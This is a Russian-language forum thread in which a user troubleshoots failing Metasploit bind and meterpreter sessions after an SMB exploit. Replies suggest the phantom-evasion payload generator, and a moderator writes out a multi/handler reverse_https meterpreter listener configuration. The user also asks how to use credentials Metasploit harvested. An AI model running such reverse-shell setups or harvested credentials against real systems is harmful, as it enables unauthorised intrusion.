• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фаззинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

Проблема Не работает shell

Elektrolife

Well-known member
21.10.2016
199
28
#1
Всем привет!

Проблема следующая: на уязвимой машине поднимаю шелл ( windows/shell/bind_tcp). При попытке подключения метасплоит повисает в неопределенном состоянии и не даёт делать никаких действий кроме как выйти из сессии (ctr+c). Повысить сессию до meterpreter тоже завершается неудачей.

В чём может быть проблема ?

1517987100204.png

1517987188674.png

---- Добавлено позже ----

Каким то чудом пробился в сессию MP,но меню как то не очень похоже на привычное,сильно урезан функционал ( Почему ?

1517988816162.png

Посмотреть вложение 15523
 
Последнее редактирование:

Dr.Lafa

Mod. Hardware
Gold Team
30.12.2016
440
833
#2
Симпатии: Понравилось Ondrik8

Elektrolife

Well-known member
21.10.2016
199
28
#5
пробовал reverse_tcp вместо этого?
у меня нет статики,а через no-ip почему то сразу резолвит локальный адрес и не хочет обращаться через ddns

Ещё очень интересно,что это за урезанная версия МП и почему не работают команды
 

woolf1514

Well-known member
06.03.2017
162
154
#6

Elektrolife

Well-known member
21.10.2016
199
28
#7
так это вообще не МП)


По запросу session показывает что meterpreter ) По факту я думаю,что эксплоит отрабатывает но как то неправильно. Потому что сканнер показывает,что цель не подвержена эксплойту SMB,но тем не менее сессии прилетают )
 

kot-gor

Gold Team
07.09.2016
529
636
#10
дело не в полезной нагрузке..а в метасплойте самом...сам сталкивался с данным чудом.
у меня такое случалось когда настраивал ssl шифрования, и запускал листенер в фоном режиме , т.е exploit -J
 

Elektrolife

Well-known member
21.10.2016
199
28
#11
вообще это метерпретер...решили свою проблему?
Не,так и не заработало (

---- Добавлено позже ----

Хм, юзай phantom-evasion и не парься)
Что есть phantom-evasion ? ) Предполагаю - генератор полезной нагрузки.

Тут проблема скорее в адекватном приёме сессии
 
Последнее редактирование:
07.09.2017
271
316
#12
Не,так и не заработало (

---- Добавлено позже ----



Что есть phantom-evasion ? ) Предполагаю - генератор полезной нагрузки.

Тут проблема скорее в адекватном приёме сессии
Читай)Тык.. не ну если криво летит, то тут уже не в этом дело.. ты уверен что проброс портов в поряде и тд?
 

kot-gor

Gold Team
07.09.2016
529
636
#15
у вас мертвая сессия..одна из причин неправильные настройки листенера.Вы в локальной сети проводили тестирование, или с внешней.?
 

kot-gor

Gold Team
07.09.2016
529
636
#19
вы использовали ReverseListenerBindAddress в листенере?
скиньте мне ваш листенер, более чем уверен вы там ошиблись.Дело в том, что если вы тестируете через роутер с белым статическим айпи настройки листенера немного другие..примерно так:

msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (внешний ip)
msf exploit (handler) > set LPORT 4444
msf exploit (handler) > set ReverseListenerBindAddress (внутренний IP)
msf exploit (handler) >exploit -j
 
Симпатии: Понравилось Vertigo

Elektrolife

Well-known member
21.10.2016
199
28
#20
вы использовали ReverseListenerBindAddress в листенере?
скиньте мне ваш листенер, более чем уверен вы там ошиблись.Дело в том, что если вы тестируете через роутер с белым статическим айпи настройки листенера немного другие..примерно так:

msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (внешний ip)
msf exploit (handler) > set LPORT 4444
msf exploit (handler) > set ReverseListenerBindAddress (внутренний IP)
msf exploit (handler) >exploit -j
блин,не могу найти теперь таргет,после него забабахал уже кучу других... По факту - я точно не указывал ReverseListenerBindAddress )

немножко оффтоп:

метасплоит накопал некоторое количество кредов,но я никак не пойму,как ими воспользоваться ) В браузере по указанным портам не выдаёт форму логина\пароля... Как он проверил их на валидность ?

1520417714474.png
 
Вверх Снизу